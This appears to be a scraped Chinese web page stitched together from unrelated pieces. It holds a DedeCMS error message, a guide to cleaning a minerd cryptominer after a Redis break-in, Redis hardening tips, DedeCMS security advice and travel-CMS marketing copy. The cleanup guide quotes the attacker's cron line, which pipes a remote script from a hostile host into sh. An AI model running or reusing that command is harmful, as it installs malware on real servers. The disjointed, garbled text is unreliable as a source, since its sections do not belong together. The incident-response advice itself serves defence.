数据保存到数据库附加表 `ws_li` 时出错，请把相关信息提交DedeCms官方。Column 'body' specified twice

dedecms是免费的开源程序，是不收任何费用的，作为国内第一个开源的内容管理系统，DedeCMS在创建以来都在摸索中国互联网内容管理系统的道路，并且引领众多开源CMS前进的道路，程序由当年个人作品，现已组建团队，在提升用户服务、提高产品质量的同时，对中国网站内容管理系统进行研究，成为目前市场上最受欢迎的内容管理系统。

1 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP

2 chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3 pkill minerd ,杀掉进程

4 service stop crond 或者 crontab -r 删除所有的执行计划

5 执行top，查看了一会，没有再发现minerd 进程了。

6检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blogjobbolecom/94518/然后就注入了病毒，下面是解决办法和清除工作：

1 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2 打开 ~/ssh/authorized_keys, 删除你不认识的账号

3 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉

1 dedecms的自定义字段的字段名称不允许有特殊符号吧，你看看你是不是有特殊符号。

2 我遇到过后台添加自定义字段，有时候数据库的字段中不会出现，看看数据库，貌似你的报错不是没有字段，字段不合法吧。

DEDECMS最近频繁出现安全漏洞，很多客户网站被黑，挂上木马链接。

被黑都是由于没有及时打上补丁，所以这里提醒大家，经常进入后台检查一下是否有补丁，发现有补丁及时打上。

1由于DEDECMS开源，源代码未经过任何加密，黑客可以分析程序源代码来发现漏洞。

2DEDECMS用户数量惊人，国内有几百万网站在使用，黑客一但发现漏洞，非法入侵网站来谋取巨大利益也是重要的一个原因。

3织梦创始人IT伯拉图离开织梦以后，

dedecms长时间未有大的更新。

二、预防被黑客攻击

1网络上没有绝对的安全，基本上所有做网站的都有被黑经理，包含我们人，包含91dedecom都有被黑过。

2防黑必须提高自身安全知识，选择正规的空间商，自己的服务器的话需要找专业的人配置环境，服务器上能不装的软件一律不装(包括所有杀毒软件都不要装)，服务器上能不开的端口一律不开放。服务器及时打上系统补丁。

3DEDECMS一般漏洞被公布后一两天官方就会出现补丁，大家发现有补丁马上更新，一般情况下是轮不到你的网站被黑，如果在第一时间还没出补丁就被黑了，那么恭喜你，你的网站经营的不错已经得到了广大黑客的认可。。

三、被黑以后的处理

1有备无患，大家一定要经常备份，选择好点的空间商一般也会提供定期备份服务，不过大家最好还是自己定期备份，这样不管出现任何问题，都可以还原备份来解决。

做为一个网站管理者，必须要努力提升自我的安全意识。大概就写这么多了。。

　　一个好的旅游网站管理系统（简称旅游CMS）最好具有自主知识产权和良好的升级机制，长期稳定的升级既能能保证系统功能越来越完善又能保证系统使用数据安全。

　　其次做为旅游CMS系统，网站的系统功能要完善，不应该存在网站前台展现后台不能控制的功能，好的CMS系统包括前台的模块增减、排序都能从后台直接控制。同时要涵盖旅游行业运营所需要的系统常见功能。

产品系统Products

线路、酒店、门票、租车、机票、签证、团购（套餐）、个性定制；（可扩展导游、特产等功能）;

文章系统Articles

目的地指南、游记攻略、景点、相册、问答、点评、帮助系统；

用户系统Users

　在线订单、在线支付、生成订单短信/邮箱通知、点评、问答、短信邮件群发；会员管理、供应商管理；

营销策略Marketing

SEO接口、社会化分享接口、积分、返现策略；出发地、目的地营销架构、支持泛解析二级域名结构、专题营销、广告管理、伪静态规则设置、生成静态页面等；

支付体系Payment

集成：支持支付宝、快钱、银联、汇潮等在线支付接口；

扩展接口Expansion

文章采集接口、Dz论坛、UCenter、Google电子地图；已集成：第三方登陆接口、短信平台接口等；

设置中心Set center

目的地4级分类、属性2级自定义、内容分类自定义、出发地设置、站点设置、系统参数管理、数据备份、操作日志；

营销助手Assistant

关键词统计、关键词智能链接、tag词设置、访问来源统计、热搜词统计、智能sitemap、死链自查

增值应用Value-added

系统升级、模板替换、营销指导、问题反馈、扩展应用等；

　　最后做为旅游CMS系统要有开放的心态程序开源不加密是保证用户二次开发的基础,也是可以称为CMS系统的前提。如果程序加密了，很多核心的定制功能将收到限制，不利于后期特色运营。当然开源需要勇气，直接面对盗版横行，一方面需要旅游CMS系统提供良好的售后升级和运营指导体现正版的价值，另一方面也需要我们自己使用者具有维护正版的正确认识，只有我们使用正版付费，才可能得到持续完善的售后支持和安全升级保证系统正常运营推广。